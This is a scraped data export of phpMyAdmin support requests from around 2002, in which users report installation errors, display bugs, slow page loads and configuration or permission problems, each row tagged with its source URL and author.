Original URL https sourceforge.net p phpmyadmin support requests 83 https sourceforge.net p phpmyadmin support requests 83 Original author muskiediver","bug"
"24444","1901","Wrong frame reloaded after create waiting for info)).
I m using a LAMP Server, l=SuSE Linux 8.0, kernel version 2.4.18 4GB, a=Apache1.3.23, m=MySQL 3.23.48, p=PHP 4.2.1.
After creating a new table, the left frame is not updated with the actual list of tables.
Instead, the list appears in the right frame, overwriting the intended content.
I haven t a sourceforge account.
Please reply to bwieboldt t online.de Thanks Original URL https sourceforge.net p phpmyadmin support requests 84 https sourceforge.net p phpmyadmin support requests 84 Original author anonymous","bug"
"24444","1902","2.3.0 rc3) only blank page.
I can t get RC3 to work.
I always get a blank page.
I tried an empty config.inc and configured it like my old one from RC2.
This occurs since RC3.
RC2 works fine.
IE 5, IE6 on NT4 PHP 4.2.1 Original URL https sourceforge.net p phpmyadmin support requests 85 https sourceforge.net p phpmyadmin support requests 85 Original author j0erch","bug"
"24444","1903","Insert new row inserts empty rows.
Choose browse a table, then click Insert new row at the bottom of the page.
Enter values and submit.
This action inserts lots of empty rows.
In my case it inserted 49 extra empty rows.
Original URL https sourceforge.net p phpmyadmin support requests 86 https sourceforge.net p phpmyadmin support requests 86 Original author anonymous","bug"
"24444","1904","2.3.0 rc3) javascript errors waiting for info)).
After doing some navigation or deleteing some database or inserting some rows etc...
I get javascript errors, and then everything stops working.
I have to click database name on the left frame to start a clean screen, with no javascript errors.
Original URL https sourceforge.net p phpmyadmin support requests 87 https sourceforge.net p phpmyadmin support requests 87 Original author anonymous","bug"
"24444","1905","Host not found error.
Using Konqueror and Mozilla I get a host not found error when trying to browse a table localhost).
Specs PHP 4.3 dev Apache 1.3 Linux Mandrake 8.1 Original URL https sourceforge.net p phpmyadmin support requests 88 https sourceforge.net p phpmyadmin support requests 88 Original author mephidmann","bug"
"24444","1906","add No Cache header.
Entries do not appear to update when editing same entry more than once.
Add a no cache header in the source code.
Original URL https sourceforge.net p phpmyadmin support requests 89 https sourceforge.net p phpmyadmin support requests 89 Original author anonymous","bug"
"24444","1907","CGI Error.
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are ??
I ve entered host, user, pass, and the cfg[ PmaAbsoluteUri ] = ; is as written here...
??
Original URL https sourceforge.net p phpmyadmin support requests 90 https sourceforge.net p phpmyadmin support requests 90 Original author anonymous","bug"
"24444","1908","errno descriptions.
I just tried to alter a database type, and I get Can t create table .
db sql 328 4e2685.frm errno 140) Is it possible to find a description of the error?
otherwise that errornumber isn t really worth anything please tell me at nighttrain11 hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 91 https sourceforge.net p phpmyadmin support requests 91 Original author anonymous","bug"
"24444","1909","URL not found.
All over the place, I am getting this The requested URL phpmyadmin2 sql.php was not found on this server.
according to debian, i am using phpmyadmin 2.2.3 1 email me please hu.peress mail.mcgill.ca Original URL https sourceforge.net p phpmyadmin support requests 93 https sourceforge.net p phpmyadmin support requests 93 Original author anonymous","bug"
"24444","1910","can t get through phpmyadmin.
Hi, My web host offer phpmyadmin for mySQL.
I can get to their cpanel, but when I clicked on phpmyadmin, the page starts loading bit by bit, then it stops completedly at 39 .
I have tried their suggestions but no use.
Why I can t get through?
I use AOL 7.0, laptop IBM thinkpad.
Thanks dave Original URL https sourceforge.net p phpmyadmin support requests 92 https sourceforge.net p phpmyadmin support requests 92 Original author anonymous","bug"
"24444","1911","Faulty .SQL Export script generated.
If on of the data tables has a space in its name then the .SQL file generated by the EXPORT facility will not run.
The database name should be surrounded by etc..
Rob Original URL https sourceforge.net p phpmyadmin support requests 94 https sourceforge.net p phpmyadmin support requests 94 Original author anonymous","bug"
"24444","1912","2.3.0 rc4) INSERT from TEXTFILE erases filename.
When trying to insert a text file via the upload form, the BROWSE option correctly displays the path to the data file on the location machine, but executing the query results in an error see below).
The path and filename of the data file appears to be missing in the query.
Platform FreeBSD 4.6 RELEASE, PHP 4.2.1, Apache 1.3.26 Error SQL query LOAD DATA LOCAL INFILE INTO TABLE `tmptable` FIELDS TERMINATED BY , OPTIONALLY ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said File not found Errcode 2) Original URL https sourceforge.net p phpmyadmin support requests 95 https sourceforge.net p phpmyadmin support requests 95 Original author kenmaier","bug"
"24444","1913","Pages take long to display on Mozilla 1.1a.
It takes several seconds for a page to load and display on Mozilla 1.1a.
I know for sure that this is not a Mozilla problem since all other websites load quickly.
On IE there is no problem though.
I would suspect that amp;lt;table amp;gt;s are too complicated or something.
Original URL https sourceforge.net p phpmyadmin support requests 96 https sourceforge.net p phpmyadmin support requests 96 Original author anonymous","bug"
"24444","1914","persistent black cells when mouseover.
The latest downloaded version of phpmyadmin has a strange amp;quot;bug amp;quot; when I choose a table and put the mouse over a cell or over a line, the complete line becomes BLACK and doesn t come back with the first color when I m going away.
You can contact me at michel.clar free.fr Original URL https sourceforge.net p phpmyadmin support requests 97 https sourceforge.net p phpmyadmin support requests 97 Original author anonymous","bug"
"24444","1915","PMA relation 2.3.0 rc4).
Pls.
drop PRIMARY Index and add Index like on foreighn field.
This change allows to reffer from one Table Field to more than one Tables Fields.
Greetings Gregor Original URL https sourceforge.net p phpmyadmin support requests 98 https sourceforge.net p phpmyadmin support requests 98 Original author anonymous","bug"
"24444","1916","parse error.
Hi, I just downloaded the last stable version and tried to install.
I get the following error Parse error parse error in .
libraries sqlparser.lib.php3 on line 571 I uploaded that file again but no change.
Any idea what happened?
Thanks, Klaus Original URL https sourceforge.net p phpmyadmin support requests 99 https sourceforge.net p phpmyadmin support requests 99 Original author anonymous","bug"
"24444","1917","header problem, probably my mistake.
Running Apache 2.0.39, always getting amp;quot;cannot send headers, headers already sent by... amp;quot;.
Running 2.3.0 rc4 If I overlooked the documentation, describing how to fix this by configuration, please accept my appologies.
Original URL https sourceforge.net p phpmyadmin support requests 100 https sourceforge.net p phpmyadmin support requests 100 Original author detruyerj","bug"
"24444","1918","Problems on RH 7.3.
PhpMyAdmin pages take minutes to for the pages to load in the browser with stock redhat 7.3 rpms installed, and all up2date upgrades applied.
RH 7.2 stock rpms with all updates works fine.
I have tested this on 3 different servers all stock installs with all updates.
Every version from 2.2.3 PMA to the latest available from sourceforge.
Lynx from the localhost is greased lightning.
Any ideas ?
Original URL https sourceforge.net p phpmyadmin support requests 101 https sourceforge.net p phpmyadmin support requests 101 Original author anonymous","bug"
"24444","1919","can t run PHPmyadmin 2.3.0. i set authentication is http in the config.inc.php ,when i log on, it say amp;quot;Can not use iconv nor libiconv nor recode string function while extension reports to be loaded.
Check your php configuration.
amp;quot; Why ?
= what i need to do with this = Original URL https sourceforge.net p phpmyadmin support requests 102 https sourceforge.net p phpmyadmin support requests 102 Original author anonymous","bug"
"24444","1920","slow on XP.
I ve tried the forums to no avail.
Ever since I got XP I cannot use phpmyadmin on our website data server.
Its specs IIS 5 Windows 2000 server php 4.2.2 phpmyadmin 2.2.6 mysql 3.23.51 nt It actually still works but at a snail s pace.
It is too frustrating to use, so I jump on coworker s win 98 or win 2000 pro machines to use phpmyadmin.
It works like it s supposed to on those machines.
I have noticed that all xp machines in the building have the same issue.
We have the directory phpmyadmin windows user protected and taking this off does not affect the performance.
I can connect to my personal phpmyadmin and coworker s 2000 pro phpmyadmin machines fine, so I have no idea what s going on here.
Has been like this ever since I got xp many months ago.
I have exhausted any possible help from our network admin and hardware techs.
I hope there is a solution because I love phpmyadmin and am not familiar with using a command prompt.
To summarize, I can use all the features of phpmyadmin, but it takes way too long to load the pages after clicking a link.
Thank you, James Barry Original URL https sourceforge.net p phpmyadmin support requests 103 https sourceforge.net p phpmyadmin support requests 103 Original author phpmyass","bug"
"24444","1921","PMA database error.
I ve just installed phpMyAdmin 2.3.0. and I ve receveid this error Error The additional Features for working with linked Tables have been deactivated.
To find out why click here.
after clicking PMA Database ... not OK[ Documentation ] General relation features Disabled I don t know what it means, other functions seems to work well.
anyone can help me?
bye Massimo Original URL https sourceforge.net p phpmyadmin support requests 104 https sourceforge.net p phpmyadmin support requests 104 Original author massimoxxx","bug"
"24444","1922","que pasa.
Error MySQL ha dicho Unknown MySQL Server Host http 0) Original URL https sourceforge.net p phpmyadmin support requests 106 https sourceforge.net p phpmyadmin support requests 106 Original author anonymous","bug"
"24444","1923","2.3.0) I can t see Create database link.
I m running PHP Version 4.2.2 on Apache 2.0 and MySQL 4.0.2 alpha on Windows 98se system.
When I type an SQL query Create database xxx than all works fine, but I can t see Create database link in main window.
Original URL https sourceforge.net p phpmyadmin support requests 105 https sourceforge.net p phpmyadmin support requests 105 Original author anonymous","bug"
"24444","1924","phpMyAdmin 2.3.0 is amazing SLOW.
Hi, have PHP 4.2.2 MySQL 3.23.52 Apache 1.3.26 Solaris 8 phpMyAdmin work fine but is very very slow, id don t know what is wrong.
Please Help Original URL https sourceforge.net p phpmyadmin support requests 107 https sourceforge.net p phpmyadmin support requests 107 Original author anonymous","bug"
"24444","1925","phpmyadmin changes my host adress.
when i start phpmyadmin it says amp;quot;MySQL Connection Failed Access denied for user phpkid orinoco Using password YES) amp;quot; so i saw orinoco needed to be sql because thats my host adress.
so i changed it in de config.inc.php file but it s still says amp;quot;MySQL Connection Failed Access denied for user phpkid orinoco Using password YES) amp;quot; Original URL https sourceforge.net p phpmyadmin support requests 108 https sourceforge.net p phpmyadmin support requests 108 Original author phpkid","bug"
"24444","1926","error 13!??.
hi, ive been trying my hardest to install phpmyadmin.
i finally got the index.php page to work but now it shows this comment Database redefine online com running on localhost Warning MySQL Unable to save result set in home sites site29 web phpmyadmin db details.ph p on line 112 Error SQL query SHOW TABLE STATUS FROM `redefine online com` MySQL said Can t read dir of .
redefine online com Errcode 13) please can someone tell me what this means?
im using version phpMyAdmin 2.2.7 pl1 by the way and MySQL 3.23.37.
Original URL https sourceforge.net p phpmyadmin support requests 109 https sourceforge.net p phpmyadmin support requests 109 Original author estidog","bug"
"24444","1927","Need Help really bad.
I have installed the phpMyAdmin 2.3.1 rc1 php and i am getting an error libraries common.lib.php on line 892 Error SQL query mysql list dbs ) MySQL said Access denied for user alloutworks localhost Using password YES) Please help Please email me at webmaster alloutworks.com Thanks Original URL https sourceforge.net p phpmyadmin support requests 110 https sourceforge.net p phpmyadmin support requests 110 Original author anonymous","bug"
"24444","1928","Attempts to login to all db on same serv.
I have the config file variables set as follows cfgServers[ i][ host ] = localhost ; cfgServers[ i][ connect type ] = tcp ; cfgServers[ i][ controluser ] = my user ; cfgServers[ i][ controlpass ] = ; cfgServers[ i][ auth type ] = config ; cfgServers[ i][ user ] = my user ; cfgServers[ i][ password ] = ; cfgServerq[ i][ only db ] = my user ; The only db is set to display a single specific database.
The other fields are filled with correct user s information.
Phpadmin connects to the database and displays correctly as specified.
However I was looking through the SQL logs, and found that when phpadmin connects to the server it attempts to login to every database on the server, not just the one I ve specified.
SQL Log example 020924 4 56 03 4119 Init DB Access denied for user brainv localhost to database user1 4119 Init DB Access denied for user brainv localhost to database user2 4119 Init DB my user 4119 Init DB Access denied for user brainv localhost to database user3 4119 Init DB Access denied for user brainv localhost to database user4 4119 Init DB Access denied for user brainv localhost to database user5 I ve been reviewing the documentation and I don t see a switch that will force phpadmin to only login to the database specified.
Did I miss it?
or is this by design?
Thanks for your Help.
SaraGoblin Original URL https sourceforge.net p phpmyadmin support requests 111 https sourceforge.net p phpmyadmin support requests 111 Original author anonymous","bug"
"24444","1929","phpMyAdmin v 2.6 and v 3.0 speed problem.
I have found a problem with phpMyAdmin v 2.6 and v 3.0.
I am not sure if this problem is with phpMyAdmin, or some other area.
Using mySQL 3.23 Redhat 7.3 Apache Attempting to connect with Internet Explorer versions 4.0 6.0 Netscape Navigator 4.76 ISP Rogers Cable Ontario, Canada) When connecting using other ISPs, phpMyAdmin seems to run fine.
When attempting to connect through any computer with a Rogers internet connection, phpMyAdmin slows to a crawl.
It usually takes 5 minutes to load one page.
Is there any insights into this problem?
Please email me at mike nextopia.com Original URL https sourceforge.net p phpmyadmin support requests 112 https sourceforge.net p phpmyadmin support requests 112 Original author anonymous","bug"
"24444","1930","error in left frame.
Hi there, I get this error in the left frame of phpMyAdmin s index.php when I load it in a browser window...
Warning Unable to save MySQL query result in vol home axiossystems public html admin phpMyAdm in libraries common.lib.php on line 892 followed by a stack of control characters.
Have worked for 2 days trying to get rid of it without luck.
Did discover that if I hard coded a database name into the config file, I would get a page saying amp;quot;No databases amp;quot; there are none at the moment) and the error would not be displayed, but neither would any links to create databases or indeed do anything apart from change language.
Would appreciate any suggestions!
running on Unix server.
connection to mySQL seems ok. Colin Original URL https sourceforge.net p phpmyadmin support requests 113 https sourceforge.net p phpmyadmin support requests 113 Original author anonymous","bug"
"24444","1931","Documentation clarification.
According to the documentation see doc section below), the controluser should have select priv only on mysql.user and all columns on mysql.db.
In the example GRANT statements also shown below), it looks like the reverse of what is stated above occurs, meaning the controluser gets the select priv on mysql.db and all on mysql.user.
Which is correct?
Documentation excerpt ================= For http and cookie modes, phpMyAdmin needs a controluser that has only the SELECT privilege on the mysql.user all columns except amp;quot;Password amp;quot;), mysql.db all columns) amp;amp; mysql.tables priv all columns except amp;quot;Grantor amp;quot; amp;amp; amp;quot;Timestamp amp;quot;) tables.
You must specify the details for the controluser in the config.inc.php3 file under the cfg[ Servers ][ i] [ controluser ] amp;amp; cfg[ Servers ][ i][ controlpass ] settings.
This example assumes you want to use pma as the controluser and pmapass as the controlpass GRANT USAGE ON mysql.
TO pma localhost IDENTIFIED BY pmapass ; GRANT SELECT Host, User, Select priv, Insert priv, Update priv, Delete priv, Create priv, Drop priv, Reload priv, Shutdown priv, Process priv, File priv, Grant priv, References priv, Index priv, Alter priv) ON mysql.user TO pma localhost ; GRANT SELECT ON mysql.db TO pma localhost ; GRANT SELECT Host, Db, User, Table name, Table priv, Column priv) ON mysql.tables priv TO pma localhost ; ... and if you want to use the many new relation and bookmark features GRANT SELECT, INSERT, UPDATE, DELETE ON amp;lt;pma db amp;gt; TO pma localhost ; this of course requires you to have a special DB for phpMyAdmin, the contents will be explained later) amp;lt;!
End doc excerpt amp;gt; Thank you, Dean djl lycos.com Original URL https sourceforge.net p phpmyadmin support requests 114 https sourceforge.net p phpmyadmin support requests 114 Original author anonymous","bug"
"24444","1932","Lost Records On Text File Upload.
Hi, I have a textfile with 10,700 lines.
Each line contains one email address.
When I amp;quot;insert data from a textfile into table amp;quot; I lose nearly 8,000 records.
Any tips on making sure a textfile is suitable for importing?
I am using phpMyAdmin 2.3.1 on MySQL 3.23.33.
Thanks in advance.
C. Original URL https sourceforge.net p phpmyadmin support requests 115 https sourceforge.net p phpmyadmin support requests 115 Original author chaoticanuck","bug"
"24444","1933","2.2.0) Syntax Error backslashes added.
I am running the following query SELECT FROM Authorization WHERE name= Tim ; I get this error You have an error in your SQL syntax near \ Tim\ ; LIMIT 0, 30 at line 1 They query works fine from the command line.
We re running 2.2.0 Thanks Original URL https sourceforge.net p phpmyadmin support requests 116 https sourceforge.net p phpmyadmin support requests 116 Original author anonymous","bug"
"24444","1934","linked tables have been deactivated.
Error The additional Features for working with linked Tables have been deactivated.
To find out why click here.
i get this error.. what should i do to fix it?
it want me to create some sort of databas for a superuser.. i have no idea..
Original URL https sourceforge.net p phpmyadmin support requests 117 https sourceforge.net p phpmyadmin support requests 117 Original author anonymous","bug"
"24444","1935","Tripod.co.uk settings?.
Hi, installed myphpadmin on my Tripod site and I get the following error message in the left frame Error SQL query mysql list dbs ) MySQL said That s the lot, no actual message saying what s wrong.
The settings I ve used in the config file are the ones I ve always used for mySQL access cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ controluser ] = ; cfg[ Servers ][ i][ controlpass ] = ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = amp;lt;username amp;gt; ; cfg[ Servers ][ i][ password ] = cfg[ Servers ][ i][ only db ] = amp;lt;username amp;gt; uk db ; With amp;lt;username amp;gt; being my username obviously.
Any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 118 https sourceforge.net p phpmyadmin support requests 118 Original author hivekemp","bug"
"24444","1936","Expanding using Stuffit Mac.
I cannot open the files using Stuffit Deluxe nor Stuffit Expander for the Mac OS X Jaguar); any ideas for what I m doing wrong?
I ve opened other zip bz2 files previously without a problem Original URL https sourceforge.net p phpmyadmin support requests 119 https sourceforge.net p phpmyadmin support requests 119 Original author anonymous","bug"
"24444","1937","Undefined variable.
When I create a new user when they log on the following error message is displayed twice Notice Undefined variable re in C \Program Files\PHP Home Edition 2\www\phpMyAdmin\main.php on line 233 Notice Undefined variable re in C \Program Files\PHP Home Edition 2\www\phpMyAdmin\main.php on line 233 Copy of main.php attached.
Thanks Enis Original URL https sourceforge.net p phpmyadmin support requests 120 https sourceforge.net p phpmyadmin support requests 120 Original author enis","bug"
"24444","1938","Display tables with more than five field.
I am using Apache2 0 40 PHP4 2 1 WinXP MySQL4 0 3 MyAdmin2 3 2 When I create a table with more than five or so fields, the table is created but I cannot view it with phpMyAdmin.
It gives amp;quot;The page cannot be displayed amp;quot; each time I click on that table to open it.
If I create the table with fewer fields, it displays fine but as I add fields one at a time, when I get to five, it will no longer display.
I was using MyAdmin2 3 1 yesterday but upgraded to 2 3 2 today and both have this problem.
Your help would be much appreciated!
Original URL https sourceforge.net p phpmyadmin support requests 121 https sourceforge.net p phpmyadmin support requests 121 Original author anonymous","bug"
"24444","1939","2.3.2) can t type in sql codes.
I am running phpMyadmin 2.3.2 on a LAMP System.
All functions which phpMyadmin are available as long as use them via the menu by clicking them with the mouse.
If I try to type any function into a sql box I get the following error message Fatal error Cannot redeclare ) previously declared in ... libraries common.lib.php 233) in ... sql.php on line 9 I would appreciate any help.
Original URL https sourceforge.net p phpmyadmin support requests 122 https sourceforge.net p phpmyadmin support requests 122 Original author anonymous","bug"
"24444","1940","Table type Merge.
Where do I enter the union data for merge tables?
Original URL https sourceforge.net p phpmyadmin support requests 123 https sourceforge.net p phpmyadmin support requests 123 Original author kinchin","bug"
"24444","1941","Exclude 1 database from user right.
How do I exclude one or more) databases from accesing by a certrain MySQL user.
Example; I have a database with confidential information wich I want to hide for all users but the root.
Als, I don t want anyone but the root, to acces the mysql database.
Is there a special syntax to use in the database right field, to exclude one or more) databases, instead off alowing them?
Or do I have to fill in all the names of the databases that can be accessed by a certain user?
Then what if I create a new database.
I should change all users database rights?
S Original URL https sourceforge.net p phpmyadmin support requests 124 https sourceforge.net p phpmyadmin support requests 124 Original author anonymous","bug"
"24444","1942","Browsing problems with 2.2.7 pl1.
Multiple users have reported getting this error Error SQL query SHOW FIELDS FROM .
MySQL said You have an error in your SQL syntax near at line 1 Back when it is attempting to display the results from the amp;quot;Select amp;quot; page.
It displays the header SQL query, show x to x etc) but then goes to a DNS page on hitting back you get the above error, back again and you re on the amp;quot;Select amp;quot; page.
This is an inconsistant bug however it happens 65 75 of the time.
And yes, I have personally upgraded to 2.3.2 and it works fine however as with many hosts they will only touch the last amp;quot;stable amp;quot; version released.
Original URL https sourceforge.net p phpmyadmin support requests 125 https sourceforge.net p phpmyadmin support requests 125 Original author anonymous","bug"
"24444","1943","Blank Frames Upon Install.
Hello.
I installed the latest version of phpMyAdmin on my server FreeBSD, MySQL 3.23.52, PHP 4.01pl1), altered the config file as per the documentation), and logged onto the phpmyadmin directory where it was installed.
It comes up, but with nothing but two blank frames...the one on the left for nav EMPTY) and the one on the right for content EMPTY)...I know that they database is connecting because I put in a bogus password and I got the cannot connect error...
I ve setup plenty of PHP and MySQL applications as well as having written some of my own, but I m totally stumped here...any ideas?
Thanks!
Matt Howey matt xsensory.com Original URL https sourceforge.net p phpmyadmin support requests 126 https sourceforge.net p phpmyadmin support requests 126 Original author anonymous","bug"
"24444","1944","Error when editing rows.
I get this error when editing rows, anything else seems to work fine Warning Variable passed to reset ) is not an array or object in c \opensa\apache\htdocs\myadmin\tbl replace.php on line 70 Warning Variable passed to each ) is not an array or object in c \opensa\apache\htdocs\myadmin\tbl replace.php on line 195 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\libraries\ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\header.inc.php on line 28 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\header.inc.php on line 29 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\header.inc.php on line 30 Warning Cannot add header information headers already sent by output started at c \opensa\apache\htdocs\myadmin\tbl replace.php 70) in c \opensa\apache\htdocs\myadmin\header.inc.php on line 32 Original URL https sourceforge.net p phpmyadmin support requests 127 https sourceforge.net p phpmyadmin support requests 127 Original author colde","bug"
"24444","1945","2.3.2) multiple text fields in table problem.
When you define a table with two or more, I suppose) fields of type text, and then you want to edit an inserted row, you loose the value of the second text field.
Original URL https sourceforge.net p phpmyadmin support requests 128 https sourceforge.net p phpmyadmin support requests 128 Original author anonymous","bug"
"24444","1946","error message too many connections.
I have this message mysql said too many connections and i must restart mysql what can i do to not have this message Original URL https sourceforge.net p phpmyadmin support requests 129 https sourceforge.net p phpmyadmin support requests 129 Original author anonymous","bug"
"24444","1947","2.3.2) meta data names are truncated.
Regardless of what I do, meta data names are alway truncated to between 4 6 characters when preparing the SQL statement.
Makes almost all the point n click functionality of the software useless.
Original URL https sourceforge.net p phpmyadmin support requests 130 https sourceforge.net p phpmyadmin support requests 130 Original author anonymous","bug"
"24444","1948","user page?.
hi I am trying to figure out this authentication thing; adding new users etc.
but reading the documentation and support pages rather puzzle me.
So let s start with first things first Can someone explain me what the user page is?
I frequently run into that.
So i thought it has something to do with the php files called user details.php and user password.php which are in the phpmyadmin dir.
None of these files I am allowed to see though a webbrowser getting an access denied msg...
Does this also have anything to do with the settings in the config.inc.php file?
Meaning the controluser and controlpass part in there... Hope someone can help me or tell me i am way off ) Original URL https sourceforge.net p phpmyadmin support requests 131 https sourceforge.net p phpmyadmin support requests 131 Original author dutchiephp","bug"
"24444","1949","How i can add databases in 2.3.2?.
How i can add databases in 2.3.2?
THX Original URL https sourceforge.net p phpmyadmin support requests 132 https sourceforge.net p phpmyadmin support requests 132 Original author anonymous","bug"
"24444","1950","LOAD DATA LOCAL.
How do you use the commands LOAD DATA LOCAL INFILE and LOAD DATA LOCAL via phpmyadmin?
I get the following errors when I try to load my database tables from a LOAD DATA LOCAL INFILE file on my harddrive) and from a file on your server LOAD DATA INFILE LOCAL ERROR MySQL said File c \LEC Map.txt not found Errcode 2) SERVER ERROR MySQL said Access denied for user dbakerl localhost Using password YES) Original URL https sourceforge.net p phpmyadmin support requests 133 https sourceforge.net p phpmyadmin support requests 133 Original author dabc1","bug"
"24444","1951","newly created table not shown in DB.
After creating a new table in an existing DB, the new table does not appear in the table list for the DB.
This is ttrue after selecting databases from the drop down then reselcting the DB.
It stills shows the old number of tables and no new tables....
Original URL https sourceforge.net p phpmyadmin support requests 134 https sourceforge.net p phpmyadmin support requests 134 Original author dlats","bug"
"24444","1952","Says No database.
I uploaded phpmyadmin to my webserver and it worled initially but now it says no databases and only offers me a create database function when i log onto the index.php... how do i get to my already existing databse.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 135 https sourceforge.net p phpmyadmin support requests 135 Original author anonymous","bug"
"24444","1953","Lost admin login password.. phpMyAdmin was instaled on my server by a friend.
It was initially used, then left alone as the system worked.
Now we want to change some tables.
We dont remember the userid, BUT we do have the password!
If this was a standard install, would there be a standard userid?
Original URL https sourceforge.net p phpmyadmin support requests 136 https sourceforge.net p phpmyadmin support requests 136 Original author anonymous Found in version 2.4.0","bug"
"24444","1954","help with install.
hello i cant seam to get the config to install right i dont know what parts to change so i can getin to my data base Original URL https sourceforge.net p phpmyadmin support requests 137 https sourceforge.net p phpmyadmin support requests 137 Original author anonymous","bug"
"24444","1955","Wrong table names!
PHP 4.2.3 ??).
I tried to delete a table from my database.
I did the following amp;gt; check the checkbox in front of the table amp;gt; choose delete My table was named offers .
But in the are yur sure question, it said rs !
Can t PHPMyAdmin work with offe ?
Same with databases!
Database is named ColdWebISP , but on the next page it asks for WebISP to be deleted!
I m using PHPMyAdmin 2.3.2, just downloaded today!
Original URL https sourceforge.net p phpmyadmin support requests 138 https sourceforge.net p phpmyadmin support requests 138 Original author anonymous","bug"
"24444","1956","Upgrade from 2.2.7 gt; 2.3.2 Fails.
Posted to forum but no takers.
Slackware 8.0 Linux 2.4.17) Apache 1.3.20 php 4.2.2 Mysqld 3.23.51 Netscape 4.79 MyAdmin v 2.2.7 was working fine.
saved my config.inc.php as reference cleared the MyAdmin directory and restored my .htaccess installed the v2.3.2 php not php3) tgz copyied the host, auth type, user, password fields from old to new config.inc.php http localhost MyAdmin index.php errs out with amp;quot;Document has no data amp;quot; ???
if I copy other .php or .htm files to this directory they do fire Ok....
I inserted amp;lt;?phpinfo amp;gt; at the top of MyAdmin index.php and it printed what is in the atachment.
If I insert anywhere else in index.php, nothing comes out Document contained no data!
Original URL https sourceforge.net p phpmyadmin support requests 139 https sourceforge.net p phpmyadmin support requests 139 Original author anonymous","bug"
"24444","1957","delete row from browse magic quotes off, no js).
If you try to delete rows when browsing a table the quotes on the column value are escaped, causing an sql error There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unclosed quote 55 STR SQL DELETE FROM `table` WHERE `column id` = \ eb23b969a6d3516ca5996a2be41f6d1c\ LIMIT 1 Original URL https sourceforge.net p phpmyadmin support requests 140 https sourceforge.net p phpmyadmin support requests 140 Original author bumperbox","bug"
"24444","1958","not able run php for mysql.
Here is the error messages given when i run the php from http 144.16.67.180 phpMyAdmin 2.3.3 rc1 index.php please help me.
Warning Undefined index PersistentConnections in var www html phpMyAdmin 2.3.3 rc1 libraries common.lib.php on line 513 Warning Undefined index ServerDefault in var www html phpMyAdmin 2.3.3 rc1 libraries common.lib.php on line 539 Warning Cannot add header information headers already sent by output started at var www html phpMyAdmin 2.3.3 rc1 libraries common.lib.php 513) in var www html phpMyAdmin 2.3.3 rc1 index.php on line 46 Original URL https sourceforge.net p phpmyadmin support requests 144 https sourceforge.net p phpmyadmin support requests 144 Original author anonymous","bug"
"24444","1959","How do I create new users in MySQL?.
I can t figure out how to create a new user password in phpMyAdmin Version 2.2.4...
I need to create a new users password and give it permission to select, insert, update, delete, create, alter and drop.
I don t know anything about databses, so baby talk is appreciated.
;) Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 141 https sourceforge.net p phpmyadmin support requests 141 Original author anonymous","bug"
"24444","1960",".htaccess problem with 2.3.3 OT ?!?).
I upgraded 2.2.6 to 2.3.3 in a separate subdir ... copied the .htaccess edited) and .htpasswd to the new dir and now users get prompted for a username and password twice, once before anything displays then again before any images in left.php3 display.
I deleted the new .htpasswd and re generated it from that subdir same result.
Is 2.3.3 doing something different in terms of relative or absolute addressing that s causing this?
Original URL https sourceforge.net p phpmyadmin support requests 145 https sourceforge.net p phpmyadmin support requests 145 Original author bowker","bug"
"24444","1961","Accessing Database outside of localhost.
I have phpMyAdmin 2.3.2 running with MySQL 3.23.52 on MacOS X 10.2.2.
I m able to log into phpMyAdmin from the localhost.
My server is behind a DSL router with NAT.
I m able to enter the password to my root account when I access the webpage from the outside.
I m able to get the welcome phpMyAdmin page.
When I select the database, I don t get the database on the right.
I m not sure if it is an authentication problem, or a permission problem or what.
Perhaps I need more configurations on the config.inc.php3 file.
Any suggestions?
Original URL https sourceforge.net p phpmyadmin support requests 146 https sourceforge.net p phpmyadmin support requests 146 Original author anonymous","bug"
"24444","1962","while restoring an mysql db...
When I try to restore a MySQL DB it IE) hangs for a long time, and I have left it there for over 3hrs and nothing, then finally I do crl alt del.
My sql is about 34mb I am using Winxp on a P3 800 with 256mb of ram.
Original URL https sourceforge.net p phpmyadmin support requests 142 https sourceforge.net p phpmyadmin support requests 142 Original author anonymous","bug"
"24444","1963","Make charset independent from language..
I use phpMyAdmin in a Japanese environment.
Currently I am modifying the code so that the default charset SHIFT JIS) is used even if the user uses English rather than Japanese as the default language.
This way Japanese always displays properly no matter what language the user wants to the phpMyAdmin interface to be.
Would be nice if this was standard, though I m not sure how this would affect other langauges.
Thanks for a wonderful product!
Original URL https sourceforge.net p phpmyadmin support requests 143 https sourceforge.net p phpmyadmin support requests 143 Original author nurikabe","bug"
"24444","1964","Accessing Database outside of localhost.
I have phpMyAdmin 2.3.2 running with MySQL 3.23.52 on MacOS X 10.2.2.
I m able to log into phpMyAdmin from the localhost.
My server is behind a DSL router with NAT.
I m able to enter the password to my root account when I access the webpage from the outside.
I m able to get the welcome phpMyAdmin page.
When I select the database, I don t get the database on the right.
I m not sure if it is an authentication problem, or a permission problem or what.
Perhaps I need more configurations on the config.inc.php3 file.
Any suggestions?
Original URL https sourceforge.net p phpmyadmin support requests 147 https sourceforge.net p phpmyadmin support requests 147 Original author anonymous","bug"
"24444","1965","Download ???
can not find.
I have been to all the miorr site and after an intensive for the phpMyAdmin 2.3.3pl1 php.zip i get, 0 of 0 results.
My isp refered me to http phpmyadmin.net.
Does this file really exsists ?
Does anybody know a good link for d l?
